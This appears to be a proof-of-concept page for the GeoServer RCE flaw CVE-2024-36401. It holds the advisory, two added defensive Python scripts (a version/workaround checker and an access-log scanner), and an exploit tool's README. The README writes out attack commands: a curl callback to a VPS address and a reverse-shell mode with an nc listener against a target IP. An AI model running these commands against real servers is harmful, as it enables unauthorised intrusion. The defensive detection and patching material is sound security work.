
CVE-2024-36401 PoC — Remote Code Execution (RCE) vulnerability in evaluating property name expressions in Geoserver

Associated Vulnerability
Title: Remote Code Execution (RCE) vulnerability in evaluating property name expressions in Geoserver (CVE-2024-36401)
Description: GeoServer is an open source server that allows users to share and edit geospatial data. Prior to versions 2.22.6, 2.23.6, 2.24.4, and 2.25.2, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions. The GeoTools library API that GeoServer calls evaluates property/attribute names for feature types in a way that unsafely passes them to the commons-jxpath library which can execute arbitrary code when evaluating XPath expressions. This XPath evaluation is intended to be used only by complex feature types (i.e., Application Schema data stores) but is incorrectly being applied to simple feature types as well which makes this vulnerability apply to **ALL** GeoServer instances. No public PoC is provided but this vulnerability has been confirmed to be exploitable through WFS GetFeature, WFS GetPropertyValue, WMS GetMap, WMS GetFeatureInfo, WMS GetLegendGraphic and WPS Execute requests. This vulnerability can lead to executing arbitrary code. Versions 2.22.6, 2.23.6, 2.24.4, and 2.25.2 contain a patch for the issue. A workaround exists by removing the `gt-complex-x.y.jar` file from the GeoServer where `x.y` is the GeoTools version (e.g., `gt-complex-31.1.jar` if running GeoServer 2.25.1). This will remove the vulnerable code from GeoServer but may break some GeoServer functionality or prevent GeoServer from deploying if the gt-complex module is needed.
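
The advisory above gives two things a defender can check mechanically: the first fixed release on each affected branch, and whether the `gt-complex-x.y.jar` workaround has been applied. The script below is an added example written for this page; it is not part of the PoC repository or of GeoServer. It takes a GeoServer version string and, optionally, the path to the instance's `WEB-INF/lib` directory, and reports whether the version predates its branch fix and whether any `gt-complex` jar is still present. The handling of branches the advisory does not list (older than 2.22, newer than 2.25) is an assumption stated in the code.

```python
import os
import re
import sys
from typing import Optional

# First fixed release on each affected branch, taken from the advisory text.
FIXED = {
    (2, 22): (2, 22, 6),
    (2, 23): (2, 23, 6),
    (2, 24): (2, 24, 4),
    (2, 25): (2, 25, 2),
}

# Jar name pattern named by the workaround, e.g. gt-complex-31.1.jar.
GT_COMPLEX = re.compile(r"gt-complex-\d+(?:\.\d+)*(?:-\w+)?\.jar")


def parse_version(text: str) -> tuple:
    """'2.25.1', 'v2.24' or '2.23.6-SNAPSHOT' -> (major, minor, patch)."""
    m = re.match(r"\s*v?(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        raise ValueError(f"unrecognised GeoServer version: {text!r}")
    return int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)


def is_vulnerable(version: str) -> bool:
    """True when the version is below the first fixed release of its branch."""
    v = parse_version(version)
    branch = v[:2]
    if branch in FIXED:
        return v < FIXED[branch]
    # Assumption for branches the advisory does not list: anything older than
    # 2.22 never received a fix; anything newer than 2.25 was released after
    # the fix and carries it.
    return branch < (2, 22)


def gt_complex_jars(jar_names) -> list:
    """Jars in WEB-INF/lib that the workaround removes; non-empty means it was not applied."""
    return sorted(n for n in jar_names if GT_COMPLEX.fullmatch(n))


def assess(version: str, lib_dir: Optional[str] = None) -> dict:
    """Combine the version check with an optional look at WEB-INF/lib on disk."""
    result = {"version": version, "vulnerable_version": is_vulnerable(version)}
    if lib_dir:
        result["gt_complex_jars"] = gt_complex_jars(os.listdir(lib_dir))
    return result


if __name__ == "__main__":
    # usage: python check_geoserver.py <geoserver-version> [path/to/geoserver/WEB-INF/lib]
    print(assess(sys.argv[1], sys.argv[2] if len(sys.argv) > 2 else None))
```

A version below the branch fix with no `gt-complex` jar present means the workaround is in place; a version below the fix with the jar present is the combination to escalate. The version string itself can be read from the GeoServer web UI or from the instance's packaging; the script deliberately does no network access.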
Description: A Python exploit for "GeoServer"
Readme
# CVE-2024-36401 GeoServer Exploitation Tool

## Vulnerability Overview
CVE-2024-36401 is a remote command execution vulnerability in GeoServer. By crafting a specific WFS (Web Feature Service) request, an attacker can execute arbitrary commands without authorization.

## Requirements
- Python 3.x
- Install the required dependency: `pip install requests`

## Usage
The tool supports two modes: `cmd` mode (run a command directly) and `reverse` mode (establish a reverse shell).

### 1. Test whether the target can reach the internet
Assuming the VPS address is `111.46.112.85`, use `cmd` mode to run a curl command and test whether the target server can reach external networks:

```shell
python exp.py cmd "8.147.134.121:32831" "curl http://111.46.112.85:8090/hello"
```

**Verification**: start an HTTP server on the VPS to receive the request

```shell
# run on the VPS
python -m http.server 8090
```

If the callback is received, you will see output similar to the following:

```
Serving HTTP on 0.0.0.0 port 8090 (http://0.0.0.0:8090/) ...
39.106.20.178 - - [04/Oct/2025 17:22:30] code 404, message File not found
39.106.20.178 - - [04/Oct/2025 17:22:30] "GET /hello HTTP/1.1" 404 -
```

### 2. Establish a reverse shell connection
Use `reverse` mode to establish a reverse shell connection to the specified VPS and port:

**Step 1**: set up a listening port on the VPS

```shell
# run on the VPS
nc -lvp 6666
```

**Step 2**: run the exploit tool to initiate the reverse connection

```shell
python exp.py reverse "8.147.134.121:32831" 111.46.112.85 6666
```

After it runs, the tool shows output similar to the following:

```
[+] Response Status: 400
[+] Response Length: 1121
<?xml version="1.0" encoding="UTF-8"?><ows:ExceptionReport xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:ows="http://www.opengis.net/ows/1.1" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" version="2.0.0" xsi:schemaLocation="http://www.opengis.net/ows/1.1 http://8.147.134.121:32831/geoserver/schemas/ows/1.1.0/owsAll.xsd">
<ows:Exception exceptionCode="NoApplicableCode">
<ows:ExceptionText>java.lang.ClassCastException: class java.lang.ProcessImpl cannot be cast to class org.opengis.fea
```

At this point, if exploitation succeeded, the nc listener on the VPS receives the reverse shell session.

## Tool Parameters

```
Usage:
  python exp.py cmd <target> <command>
  python exp.py reverse <target> <vps_ip> <vps_port>
```

- `cmd`: single-command execution mode
- `reverse`: reverse shell mode
- `<target>`: address and port of the target server, in the form `ip:port`
- `<command>`: the command to run on the target server
- `<vps_ip>`: IP address of the VPS
- `<vps_port>`: port the VPS is listening on

## How the Vulnerability Works
This vulnerability exploits a security flaw in the GeoServer WFS service: Java code is injected through `valueReference` to execute system commands. The tool builds an XML payload containing the malicious code and sends it to GeoServer's WFS endpoint, achieving remote command execution.
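
The detection angle follows directly from the paragraph above: a legitimate `valueReference` (or `propertyName`) is an attribute name, possibly namespaced or written as a short path, whereas an injected expression needs syntax that no attribute name contains, such as parentheses, quotes, brackets or whitespace. The scanner below is an added example written for this page, not code from the PoC repository or from GeoServer. It flags requests whose property-name parameters fall outside the plain-reference grammar, working on constructed access-log lines and on a constructed WFS XML body; treating `propertyName` as going through the same evaluation path as `valueReference` is an assumption, based on the advisory listing WFS GetFeature among the affected requests.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Request parameters that GeoServer evaluates as property-name expressions.
# valueReference is the one this README names; including propertyName is an
# assumption (WFS GetFeature is listed as affected in the advisory).
PROPERTY_PARAMS = {"valuereference", "propertyname"}

# What a legitimate attribute reference looks like: a (possibly namespaced)
# name, optionally extended as a path of such names, e.g. STATE_NAME,
# topp:states/gml:name, geom/@srsName. Parentheses, quotes, brackets and
# whitespace are expression syntax and never part of a plain reference.
_NAME = r"[A-Za-z_][\w.\-]*(?::[A-Za-z_][\w.\-]*)?"
PLAIN_REF = re.compile(rf"{_NAME}(?:/@?{_NAME})*")

# Simplified extraction from an XML POST body: attribute form and element
# form, with or without a namespace prefix.
XML_ATTR = re.compile(r'valueReference\s*=\s*"([^"]*)"', re.IGNORECASE)
XML_ELEM = re.compile(r"<(?:\w+:)?ValueReference[^>]*>([^<]*)</", re.IGNORECASE)

# Request line inside a common/combined-format access log entry.
_REQ = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def refs_from_query(query: str) -> list:
    """Percent-decoded property-name values from a query string; comma lists are split."""
    refs = []
    for key, value in parse_qsl(query, keep_blank_values=True):
        if key.lower() in PROPERTY_PARAMS:
            refs.extend(part.strip() for part in value.split(","))
    return refs


def refs_from_xml(body: str) -> list:
    """valueReference values from an XML request body (attribute and element forms)."""
    return [m.strip() for m in XML_ATTR.findall(body) + XML_ELEM.findall(body)]


def suspicious(refs) -> list:
    """Values that are not plain attribute references."""
    return [r for r in refs if not PLAIN_REF.fullmatch(r)]


def scan_access_log(lines) -> list:
    """(line_number, offending_values) for each request line with a
    non-plain property-name parameter. Line numbers start at 1. The path is
    not filtered, so a relocated /geoserver/wfs endpoint is still covered."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = _REQ.search(line)
        if not m:
            continue
        bad = suspicious(refs_from_query(urlsplit(m.group(1)).query))
        if bad:
            findings.append((n, bad))
    return findings


# Constructed sample log lines (not real traffic). Line 2 carries an
# expression-like value, written as a neutral stand-in rather than a payload.
SAMPLE_LOG = [
    '10.0.0.5 - - [04/Oct/2025:17:22:30 +0000] "GET /geoserver/wfs?service=WFS&version=2.0.0'
    '&request=GetPropertyValue&typeNames=topp:states&valueReference=STATE_NAME HTTP/1.1" 200 512',
    '10.0.0.5 - - [04/Oct/2025:17:22:31 +0000] "GET /geoserver/wfs?service=WFS&version=2.0.0'
    '&request=GetPropertyValue&typeNames=topp:states&valueReference=foo%28bar%29 HTTP/1.1" 400 1121',
    '10.0.0.9 - - [04/Oct/2025:17:22:32 +0000] "GET /geoserver/wms?service=WMS&request=GetMap'
    '&layers=topp:states HTTP/1.1" 200 9000',
]

# Constructed benign XML body using a plain path reference.
SAMPLE_BODY = (
    '<wfs:GetPropertyValue xmlns:wfs="http://www.opengis.net/wfs/2.0" service="WFS" '
    'version="2.0.0" valueReference="topp:states/gml:name">'
    '<wfs:Query typeNames="topp:states"/></wfs:GetPropertyValue>'
)

if __name__ == "__main__":
    print(scan_access_log(SAMPLE_LOG))            # [(2, ['foo(bar)'])]
    print(suspicious(refs_from_xml(SAMPLE_BODY)))  # []
```

Because the check is on shape rather than on payload strings, it does not depend on the specific Java expression a given tool sends. The HTTP 400 with a `ClassCastException` in the `ows:ExceptionReport`, shown later in this README, is a second signal worth correlating with these hits: a plain attribute reference does not produce a `java.lang.ProcessImpl` cast error. One known false positive is WFS 2.0's parenthesised multi-query KVP form, if an installation uses it; strip that wrapper before applying the check.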

## Notes
1. This tool is intended only for security research and vulnerability verification; do not use it for unauthorized testing.
2. The user bears sole responsibility for any consequences of using this tool.
3. When using the reverse shell feature, make sure you are authorized to access the target system and stay within the bounds of applicable laws and regulations.
4. In a practice-range environment, the range operator may have changed some default routes to raise the difficulty, which can cause the bundled exploit to fail. In that case you may need to change the `/geoserver/wfs` path to the corresponding value.

## Remediation
Update GeoServer promptly to the official patched versions and follow security best practices when configuring the server.
File Snapshot

```
[4.0K] /data/pocs/852f5e8758798f451240e8242a3e9cf99df0e5c1
├── [3.0K] exp.py
└── [3.4K] README.md

1 directory, 2 files
```